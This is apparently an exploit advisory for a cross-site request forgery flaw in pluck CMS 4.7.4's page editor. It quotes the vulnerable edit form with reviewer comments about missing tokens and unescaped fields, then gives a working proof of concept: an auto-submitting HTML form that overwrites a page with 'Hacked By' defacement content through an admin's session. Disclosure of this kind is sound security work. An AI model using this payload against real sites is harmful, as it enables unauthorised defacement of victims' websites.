==============================================
# Exploit Title : pluck-cms CSRF vulnerability (admin page editing)
# Reported Date : 8 - 10 - 2017
# Exploit Author : Ashiyane Digital Security Team
# CWE: CSRF - 352
# Tested On : kali Linux
# Vendor Homepage : https://www.pluck-cms.org/
# Software Link : https://github.com/pluck-cms/pluck/releases
# Version : 4.7.4
==============================================
-----------------------------
Vulnerability discovered by:
Ehsan Cod3r , Und3rgr0und
-----------------------------
Vulnerable path (local test install):
http://127.0.0.1/PluckCMS/data/inc/editpage.php
-----------------------------
Vulnerable file:
editpage.php
-----------------------------
Vulnerability method:
$_GET[] (selects the page to edit; the edit form itself is submitted with POST)
-----------------------------
Vulnerable code (edit form from editpage.php, version above):
<?php /* Page-edit form from data/inc/editpage.php (pluck 4.7.4 as quoted in the advisory).
   Reviewer note: the form posts back to the current URL (action="") and none of the
   fields written inline below is an anti-CSRF token; whatever show_subpage_select(),
   run_hook() and show_common_submits() emit is not visible in this excerpt, and the
   handler that consumes the POST is not shown, so the missing server-side token check
   is taken from the advisory rather than proven by this code alone. */ ?>
<form name="page_form" method="post" action="">
<p>
<label class="kop2" for="title"><?php echo $lang['general']['title'];
?></label>
<?php /* Pre-fills the title only when editing an existing page ($_GET['page'] set).
   $title is echoed into the attribute without htmlspecialchars(), unlike $content
   below -- confirm whether it is escaped before it reaches this template. */ ?>
<input name="title" id="title" type="text" value="<?php if
(isset($_GET['page'])) echo $title; ?>" />
</p>
<p><a href="#" class="kop2" onclick="return kadabra('seo-name');"><?php
echo $lang['page']['seo_urls']; ?></a></p>
<div id="seo-name" style="display: none;">
<?php /* SEO name falls back to the title when no explicit $seoname exists;
   same unescaped echo as $title above. */ ?>
<input name="seo_name" id="seo_name" type="text" value="<?php if
(isset($_GET['page'])) if (isset($seoname)) echo $seoname; else echo
$title; ?>" />
</div>
<label class="kop2" for="content-form"><?php echo
$lang['general']['contents']; ?></label>
<?php /* Page body; the only pre-filled value in this form that is passed
   through htmlspecialchars(). */ ?>
<textarea class="<?php if (defined('WYSIWYG_TEXTAREA_CLASS')) echo
WYSIWYG_TEXTAREA_CLASS; ?>" name="content" id="content-form" cols="70"
rows="20"><?php if (isset($_GET['page'])) echo htmlspecialchars($content);
?></textarea>
<div class="menudiv" style="width: 588px; margin-<?php if (DIRECTION_RTL)
echo 'right'; else echo 'left'; ?>: 0;">
<p><a href="#" class="kop2" onclick="return kadabra('meta-options');"><?php
echo $lang['editmeta']['title']; ?></a></p>
<p class="kop4" style="margin-bottom: 5px;"><?php echo
$lang['editmeta']['descr']; ?></p>
<div id="meta-options" style="display: none;">
<label for="description"><?php echo $lang['general']['description'];
?></label>
<br />
<?php /* Meta description and keywords are echoed unescaped into their textareas. */ ?>
<textarea id="description" name="description" rows="2" cols="40"
class="white"><?php if (isset($description)) echo $description;
?></textarea>
<br />
<label for="keywords"><?php echo $lang['editmeta']['keywords'];
?></label>
<br />
<span class="kop4"><?php echo $lang['editmeta']['comma']; ?></span>
<br />
<textarea id="keywords" name="keywords" rows="1" cols="40"
class="white"><?php if (isset($keywords)) echo $keywords; ?></textarea>
</div>
</div>
<div class="menudiv" style="width: 588px; margin-<?php if (DIRECTION_RTL)
echo 'right'; else echo 'left'; ?>: 0;">
<p><a href="#" class="kop2" onclick="return
kadabra('other-options');"><?php echo $lang['general']['other_options'];
?></a></p>
<p class="kop4" style="margin-bottom: 5px;"><?php echo
$lang['page']['options']; ?></p>
<div id="other-options" style="display: block;">
<table>
<tr>
<td><label for="hidden"><?php echo $lang['page']['in_menu'];
?></label><br /></td>
<?php /* Checkbox (label key in_menu): rendered checked for a new page, or when
   $hidden == 'no' (loose comparison, kept as in the original). */ ?>
<td><input type="checkbox" name="hidden" id="hidden" <?php if
(!isset($_GET['page']) || $hidden == 'no') echo'checked="checked"'; ?>
value="no" /></td>
</tr>
<tr>
<td><label for="sub_page"><?php echo $lang['page']['sub_page'];
?></label></td>
<?php /* Parent-page selector; the raw $_GET['page'] value is handed to the helper. */ ?>
<td> <?php if (isset($_GET['page']))
show_subpage_select('sub_page', $_GET['page']); else
show_subpage_select('sub_page'); ?></td>
</tr>
<?php /* Plugin hook: modules may add their own fields here (not visible in this excerpt). */ ?>
<?php run_hook('admin_save_page_beforepost'); ?>
</table>
</div>
</div>
<?php /* Renders the submit buttons. The 'theme' and 'save_exit' fields that the
   proof of concept below posts are not written inline above, so they presumably
   come from this helper -- TODO confirm against its source. */ ?>
<?php show_common_submits('?action=page', true); ?>
</form>
============================================================================
Exploit code (proof of concept: an auto-submitting cross-site form):
<!-- Proof of concept for the advisory above: the page auto-submits a POST to
     admin.php?action=editpage from whatever browser loads it, using the same field
     names as the quoted form plus theme and save_exit. It only has an effect while
     that browser holds an authenticated pluck admin session, and only because the
     request is accepted without a per-session token (none is sent here, and none is
     written inline in the quoted form). The fix belongs on the server: require and
     verify a session-bound token in the save handler, and give the session cookie a
     SameSite attribute so a cross-site POST does not carry it. -->
<html>
<body onload="document.exploit.submit()">
<form name="exploit" method="post" action="
http://localhost/1/PluckCMS/admin.php?action=editpage">
<input type="hidden" name="title" value="Hacked By Ehsan Cod3r">
<input type="hidden" name="seo_name" value="">
<input type="hidden" name="content" value="<h1>Hacked By Ehsan Cod3r">
<input type="hidden" name="description" value="">
<input type="hidden" name="keywords" value="">
<input type="hidden" name="hidden" value="no">
<input type="hidden" name="sub_page" value="">
<input type="hidden" name="theme" value="default">
<input type="hidden" name="save_exit" value="Save+and+Exit">
</form>
</body>
</html>